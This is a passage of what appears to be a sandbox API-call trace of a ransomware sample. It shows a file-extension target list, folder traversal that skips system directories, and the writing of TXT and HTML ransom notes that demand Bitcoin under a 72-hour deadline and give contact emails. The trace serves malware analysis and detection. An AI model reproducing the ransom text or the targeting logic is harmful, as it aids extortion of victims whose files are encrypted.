kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0167.987] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.987] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.988] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0167.990] CloseHandle (hObject=0xffffffff) returned 1
	[0167.990] CloseHandle (hObject=0xffffffff) returned 1
	[0167.990] FindNextFileW (in: hFindFile=0xfb9530, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f57a684, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9f57a684, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9f57a684, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0x620066, dwReserved1=0x610031, cFileName="resource.xml", cAlternateFileName="")) returned 0
	[0167.990] FindClose (in: hFindFile=0xfb9530 | out: hFindFile=0xfb9530) returned 1
	[0167.990] FindClose (in: hFindFile=0xfb9530 | out: hFindFile=0xfb9530) returned 0
	[0167.991] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US"
	[0167.991] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*"
	[0167.991] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.991] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.991] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\HELP_DECRYPT_YOUR_FILES.TXT") returned 119
	[0167.991] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0167.992] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0167.992] WriteFile (in: hFile=0x39c, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0167.995] CloseHandle (hObject=0x39c) returned 1
	[0167.996] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.996] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.996] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0167.998] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0167.998] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0167.998] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0167.998] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0167.999] WriteFile (in: hFile=0x39c, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0167.999] CloseHandle (hObject=0x39c) returned 1
	[0167.999] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.001] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.001] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0168.001] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\HELP_DECRYPT_YOUR_FILES.HTML") returned 120
	[0168.001] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0168.002] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0168.002] WriteFile (in: hFile=0x39c, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0168.005] CloseHandle (hObject=0x39c) returned 1
	[0168.006] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.006] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0168.006] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.007] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0168.008] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0168.008] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0168.008] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0168.009] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0168.009] WriteFile (in: hFile=0x39c, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0168.009] CloseHandle (hObject=0x39c) returned 1
	[0168.009] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x7dab9a2a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620066, dwReserved1=0x610031, cFileName=".", cAlternateFileName="")) returned 0xfb9330
	[0168.010] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*") returned 95
	[0168.010] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.010] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*", cchLength=0x5f | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*") returned 0x5f
	[0168.010] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.010] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="windows") returned 0x0
	[0168.011] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.011] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="boot") returned 0x0
	[0168.011] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.011] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="system volume information") returned 0x0
	[0168.011] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.011] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0168.011] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.011] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="temp") returned 0x0
	[0168.011] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.012] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="program files") returned 0x0
	[0168.012] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.012] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="program files (x86)") returned 0x0
	[0168.012] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.012] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="appdata") returned 0x0
	[0168.012] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.012] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="application data") returned 0x0
	[0168.013] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.013] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="winnt") returned 0x0
	[0168.013] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.013] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="tmp") returned 0x0
	[0168.013] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.013] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="cache") returned 0x0
	[0168.013] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.014] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="temporary internet files") returned 0x0
	[0168.014] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.014] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="webcache") returned 0x0
	[0168.014] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.014] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="inetcache") returned 0x0
	[0168.014] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.014] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="nvidia") returned 0x0
	[0168.014] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.015] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="packages") returned 0x0
	[0168.015] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.015] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="cookies") returned 0x0
	[0168.015] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.015] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\*.*", lpSrch="programdata") returned 0x0
	[0168.024] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0168.024] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0168.024] FindNextFileW (in: hFindFile=0xfb9330, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x7dab9a2a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620066, dwReserved1=0x610031, cFileName="..", cAlternateFileName="")) returned 1
	[0168.024] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0168.024] FindNextFileW (in: hFindFile=0xfb9330, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dab9a2a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7dab9a2a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7dab9a2a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x620066, dwReserved1=0x610031, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0168.024] FindNextFileW (in: hFindFile=0xfb9330, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7da930d7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7da930d7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7da930d7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x620066, dwReserved1=0x610031, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0168.025] FindNextFileW (in: hFindFile=0xfb9330, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f57a684, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9f57a684, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9f57a684, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0x620066, dwReserved1=0x610031, cFileName="resource.xml", cAlternateFileName="")) returned 1
	[0168.025] FindNextFileW (in: hFindFile=0xfb9330, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f57a684, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9f57a684, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9f57a684, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0x620066, dwReserved1=0x610031, cFileName="resource.xml", cAlternateFileName="")) returned 0
	[0168.025] FindClose (in: hFindFile=0xfb9330 | out: hFindFile=0xfb9330) returned 1
	[0168.025] FindClose (in: hFindFile=0xfb9330 | out: hFindFile=0xfb9330) returned 0
	[0168.025] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1
	[0168.025] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7da20b11, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7da20b11, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7da46ba3, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0168.026] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d9fa8d7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d9fa8d7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7da20b11, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0168.026] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe3c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="print_pref.ico", cAlternateFileName="")) returned 1
	[0168.026] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xebb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="print_property.ico", cAlternateFileName="")) returned 1
